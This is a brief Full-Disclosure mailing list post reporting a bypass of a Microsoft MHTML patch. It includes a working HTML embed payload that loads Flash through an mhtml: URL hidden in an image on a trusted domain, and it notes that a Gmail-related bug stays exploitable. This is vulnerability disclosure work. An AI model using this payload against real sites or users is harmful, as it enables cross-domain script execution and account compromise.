MS mhtml patch bypass

[sec yun <root () wooyun org>]

Hi

someone report a case about bypass mhtml patch

http://www.wooyun.org/bugs/wooyun-2010-01929

<embed type="application/x-shockwave-flash" src="mhtml:
http://trusteddomain.com/wooyun.jpg!wooyun.swf"; allowNetworking=all
AllowScriptAccess=samedomain width=500 height=500></embed>

some VUL like http://www.wooyun.org/bugs/wooyun-2010-01474 (gmail hack) will
stiil be exploitable

credits: http://www.wooyun.org/whitehats/latentwind

:)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/